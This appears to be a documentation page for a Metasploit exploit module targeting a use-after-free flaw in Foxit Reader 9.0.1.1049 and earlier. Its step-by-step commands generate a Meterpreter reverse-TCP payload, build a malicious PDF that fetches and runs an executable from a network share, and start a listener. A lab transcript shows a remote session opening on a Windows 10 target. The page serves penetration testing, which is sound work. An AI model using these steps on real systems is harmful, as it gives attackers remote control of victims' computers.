adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
03bb062c2e0ff3cb33dbd52dcd80dda965943239
metasploit-gs/documentation/modules/exploit/windows/fileformat/foxit_reader_uaf.md
T
Jacob Robles d5ad683ba6 More doc updates
2018-08-29 10:59:36 -05:00

3.2 KiB
Raw Blame History

Description

Foxit Reader v9.0.1.1049 and earlier are affected by use-after-free and uninitialzed memory vulnerabilities that can be used to gain code execution. This module uses Uint32Array uninitialized memory and text annotation use-after-free vulnerabilities to call WinExec with a share file path to download and execute the specified exe. The module has been tested against Foxit Reader v9.0.1.1049 running on Windows 7 x64 and Windows 10 Pro x64 Build 17134. Windows 10 Enterprise needs to have insecure logons enabled for the exploit to work as expected.

Vulnerable Application

Foxit Reader v9.0.1.1049 and earlier

Verification Steps

  1. ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> --arch x86 -f exe /share/path/tmp.exe
  2. chmod 777 /share/path/tmp.exe
  3. ./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share <share> ; set lhost <lhost> ; run
  4. use multi/handler
  5. set payload windows/meterpreter/reverse_tcp
  6. set lhost <lhost>
  7. run -j
  8. Copy pdf over to target. Start Foxit Reader then open pdf from Foxit's Menu.

Note: The target machine running Foxit Reader will need network access to the system hosting the exe.

Scenarios

Foxit Reader v9.0.1.1049 running on Windows 10 Pro x64 Build 17134

msfdev@simulator:~/git/metasploit-framework
$ ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.22.222.197 LPORT=4444 --arch x86 -f exe -o /opt/malicious/tmp.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /opt/malicious/tmp.exe
msfdev@simulator:~/git/metasploit-framework
$ chmod 777 /opt/malicious/tmp.exe 
msfdev@simulator:~/git/metasploit-framework
$ ./msfconsole -qx 'use exploit/windows/fileformat/foxit_reader_uaf ; set exename tmp.exe ; set share tmp ; set lhost 172.22.222.197 ; run '
exename => tmp.exe
share => tmp
lhost => 172.22.222.197
[*] share_path: \\172.22.222.197\tmp\tmp.exe
[+] test.pdf stored at /home/msfdev/.msf4/local/test.pdf
msf5 exploit(windows/fileformat/foxit_reader_uaf) > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.22.222.197
lhost => 172.22.222.197
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 172.22.222.197:4444 
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.197:4444 -> 172.22.222.200:49673) at 2018-08-21 07:50:34 -0500

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP\msfdev
Reference in New Issue View Git Blame Copy Permalink